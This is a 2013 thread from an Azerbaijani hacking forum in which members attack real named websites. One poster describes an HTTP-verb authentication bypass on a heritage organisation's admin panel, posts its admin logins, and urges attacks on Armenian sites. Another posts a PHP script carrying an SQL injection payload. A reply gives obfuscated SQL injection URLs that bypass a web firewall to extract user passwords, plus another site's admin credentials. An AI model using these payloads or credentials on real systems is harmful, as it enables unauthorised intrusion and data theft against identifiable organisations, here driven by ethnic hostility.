Istifadəçi |
2013-03-27 02:01 GMT |
|
|
|
Pr0grammer |
|
Mesaj Sayı : 1677 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 62 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : KARABAKH IS AZERBAIJAN! |
Ölkə : |
Məslək : |
Yaş : |
Mesaj : |
|
Əslində /admin/-ka var amma çox ehtimal ki, İP based restrcitondadır forbidden verir sənə.
http://www.hispanicheritage.org/admin/
2-ci control_panel-də form-un submit etidiyi url ölüb çoxdan
telnet cp.sgmhost.com 8443 ölüdür.
3-cüsü də sənə şad xəbər orda admikada HTTP VERB var+server misconfiguration+auth bypass var.
REQUEST METODU dəyiş COPY metodundan istifadə et (ürəyin istədiyin request metod keçəcək POST istisna olmaqla) sehrli yolla adminkada + bez parol olacaqsan
Fiddlerlə metodları manupulyasiya edə bilərsən.
Adminlər:
hhfadmin
703HHF@dm1n
vicalia
17Vicalia
Ən axırıncısı isə çox yaxşı olardıkı buna sərf etdiyin vaxtı+zəhməti erməni saytlarına qarşı edəsən.
Onda olar Super İş.
Kod: Host: www.hispanicheritage.org
User-Agent: Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
RETURN BODY: (admikanın source kodu)
[code]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Hispanic Heritage Awards</title>
<style type="text/css">
A:link {text-decoration: none; }
A:active {text-decoration: none; }
A:visited {text-decoration: none; }
A:hover {text-decoration: underline;}
.header { font-family: Verdana, Arial, Helvetica; font-size: 11px; color: #EEEEEE; font-weight: bold; }
.title { font-family: Verdana, Arial, Helvetica; font-size: 11px; color: #FFFFFF; font-weight: bold; }
.title2 { font-family: Verdana, Arial, Helvetica; font-size: 11px; color: #333333; font-weight: bold; }
.text { font-family: Verdana, Arial, Helvetica; font-size: 11px; color: #333333; }
.small { font-family: Verdana, Arial, Helvetica; font-size: 9px; color: #333333; }
.Button { background: #FFFFFF; border: 1px solid #666666; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color: #000000; font-weight: normal;}
.Boton { background: #FFFFFF; border: 1px solid #666666; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color: #000000; font-weight: normal;}
.Input { background: #FFFFFF; border: 1px solid #666666; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color: #000000; font-weight: normal;}
</style>
</head>
<body topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<table border="0" cellspacing="0" cellpadding="0" background="img/head_bg.gif" width="100%">
<tr>
<td align="left">
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td rowspan="4"><img src="img/head_logo.gif" width="236" height="100" alt="" border="0"></td>
<td width="324"><img src="../img/spacer_1x1.gif" width="1" height="1" alt="" border="0"></td>
<td><img src="img/head_title.gif" width="200" height="70" alt="" border="0"></td>
</tr>
<tr>
<td colspan="2"><img src="../img/spacer_1x1.gif" width="1" height="1" alt="" border="0"></td>
</tr>
<tr>
<td height="28"><img src="../img/spacer_1x1.gif" width="1" height="1" alt="" border="0"></td>
<td height="28" align="center" class="header"><a href="index.php" class="header">Administration</a> | <a href="logout.php" class="header">Logout</a> </td>
</tr>
<tr>
<td colspan="2"><img src="../img/spacer_1x1.gif" width="1" height="1" alt="" border="0"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#FFFFFF" height="5"><img src="../img/spacer_1x1.gif" width="1" height="1" alt="" border="0"></td>
</tr>
</table>
<table border="0" cellpadding="3" cellspacing="1" width="100%" bgcolor="#000000">
<tr>
<td height="28" class="header" bgcolor="#443153">
> <a href="index.php" class="header">Home</a>
</td>
</tr>
</table>
<br>
<table width="95%" border="0" align="center">
<tr><td align="center">
<table border="0" cellpadding="3" cellspacing="1" bgcolor="#000000" width="400">
<tr bgcolor="#443153">
<th class="title">Sections</th>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD'">
<td class="title2"><a href="content_main.php" class="title2">Content</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="categories_main.php" class="title2">Hispanic Award Categories</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD'">
<td class="title2"><a href="honoree_main.php" class="title2">Hispanic Award Honorees</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="ycategories_main.php" class="title2">Youth Award Categories</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD'">
<td class="title2"><a href="regions_main.php" class="title2">Youth Awards Regions</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="youth_main.php" class="title2">Youth Award Honorees</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD'">
<td class="title2"><a href="presenters_main.php" class="title2">Presenters & Performers</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="section_hispanic.php" class="title2">Section Hispanic Heritage Award</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD'">
<td class="title2"><a href="albums_main.php" class="title2">Albums</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="faqs_main.php" class="title2">Youth FAQ's</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD';">
<td class="title2"><a href="sponsorfaqs_main.php" class="title2">Sponsors FAQ's</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD';">
<td class="title2"><a href="sponsortestimonials_main.php" class="title2">Sponsors Testimonials</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE';">
<td class="title2"><a href="facts_main.php" class="title2">Hispanic Facts</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE';">
<td class="title2"><a href="loft_main.php" class="title2">Hispanic Loft</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD';">
<td class="title2"><a href="blinks_main.php" class="title2">Best Links</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE';">
<td class="title2"><a href="news_main.php" class="title2">News</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD';">
<td class="title2"><a href="press_main.php" class="title2">Press Releases</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE';">
<td class="title2"><a href="surveys_main.php" class="title2">Surveys</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD';">
<td class="title2"><a href="mailing_main.php" class="title2">Mailing List</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="section_home.php" class="title2">Home Honorees</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="heritage_main.php" class="title2">About your Hispanic Heritage</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD'">
<td class="title2"><a href="admins_main.php" class="title2">Administrators</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="media_main.php" class="title2">Media</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="donation.php" class="title2">Donations</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="/gallery/admin/" class="title2">ZenPhoto Gallery</a></td>
</tr>
</table>
</td></tr>
</table>
</body>
</html> ]
|
Anti-armenia.ORG |
|
Istifadəçi |
2013-03-27 20:25 GMT |
|
|
|
İstifadəçi |
|
Mesaj Sayı : 14 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 0 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : |
Ölkə : |
Məslək : |
Yaş : |
Mesaj : |
|
|
Anti-armenia.ORG |
|
Istifadəçi |
2013-03-28 21:19 GMT |
|
|
|
İstifadəçi |
|
Mesaj Sayı : 14 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 0 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : |
Ölkə : |
Məslək : |
Yaş : |
Mesaj : |
|
$POST
<?php
$url = "http://itpark.am/firm.php?";
$ua = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7";
$post = "lang=us&id=1064 union select 1 from(select count(*),concat(version(),floor(rand(0)|0))x from information_schema.tables group by x)a-- -";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
echo curl_exec($ch);
?>
|
Anti-armenia.ORG |
|
Istifadəçi |
2013-03-28 23:06 GMT |
|
|
|
Pr0grammer |
|
Mesaj Sayı : 1677 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 62 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : KARABAKH IS AZERBAIJAN! |
Ölkə : |
Məslək : |
Yaş : |
Mesaj : |
|
Sitat #24761 lezgi099 :
$POST
<?php
$url = "http://itpark.am/firm.php?";
$ua = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7";
$post = "lang=us&id=1064 union select 1 from(select count(*),concat(version(),floor(rand(0)|0))x from information_schema.tables group by x)a-- -";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
echo curl_exec($ch);
?>
Qəşəng metoddur Respect)
Amma skriptdən asılıdır hər yerdə keçmiyəcək:
Bu metod o halda aktualdır ki, vulnerable skript $_REQUEST['parametername'] medotu istifadə edir.
Kod: <?php
$id=$_REQUEST['id'];
echo htmlentities((string)$id);
/**
http://hacker1.own/12.php?id=12346
output: 123456
POST metodu ile yoxla:
eyni netice alacaqsan
******/
Belə bir hal da ola bilər:
Kod: <?php
if (count($_REQUEST)!=0 && array_key_exists('id',$_REQUEST))
{
//echo 'TRUE!!';exit;
$reqmethod=strtoupper( htmlentities ( (string) $_SERVER['REQUEST_METHOD'] ) );
//echo $reqmethod;
switch($reqmethod)
{
case 'GET':
$id=htmlentities( (string )$_GET['id']);break;
case 'POST':
$id=htmlentities( (string) $_POST['id']);break;
case 'COOKIE':
$id=htmlentities( (string) $_COOKIE['id']);break;
default: break;
}
echo '<font color="red" >' . ' REQUEST METOD: ' . $reqmethod . ' value => ' . $id . '</font>' . PHP_EOL;
}
!isset($id) ? die('PARAMETER YOXDUR!') : '';
exit;
?>
Məhz elə bu itpark.am-da da o məsələdir.
Sadə bir misal dediklərimizə (aşağıda keçmir sırf lang parametrinə çünki $_GET['lang'] -expect edir skript (elə yazılıb skript)
============================================================
/index.php?
HEADERS:
Host: arm3a.org
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=83jfvpbeksf2kl2pfpln928a72
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
$_POST data:
lang=en
============================================================
Dil dəyişmir.
Çünki skriptdə $_GET['lang'] -ı expect edir.
$_REQUEST['lang'] expect etsəydi o halda yuxarıda mod sec bypass-ı qəbul edəcəkdi.O halda həm $_GET['lang'] həm də $_POST['lang'] -i götürəcəkdi.
Ikinci bir misal ModSec üçün.
http://www.beko.am/?page=service
Host: beko.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=83jfvpbeksf2kl2pfpln928a72
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
$_POST body:
lang=-2%27%20union%20%20select%201,2,3,4,5,6,7,8--%20and%205=%275
Nəticə: Skriptin heç q*zuna deyil parameter çünki skript bu halda $_GET['lang'] expect edir.
http://www.beko.am/?page=service&lang=-2%27%20%0D%0Aunion%0D%0D/*!40101%20select*/%0D%0A%0D%0A%0D%0A1,2,3,4,5,6,7,ulist_login%20frOm%20ulist%20lImiT%201%20offset%200--%20and%205=%275
http://www.beko.am/?page=service&lang=-2%27%20%0D%0Aunion%0D%0D/*!40101%20select*/%0D%0A%0D%0A%0D%0A1,2,3,4,5,6,7,ulist_password%20frOm%20ulist%20lImiT%201%20offset%200--%20and%205=%275
Sözümün canı curl metodu həmişə etibarlı deyil sırf skriptdən asılıdır necə yazılıb.$_REQUEST söhbəti varsa o halda girəcək bypass.(ModSec üçün)
arm3a.org/cms/
Login: superadmin
pass: arm3a
|
Anti-armenia.ORG |
|
|
|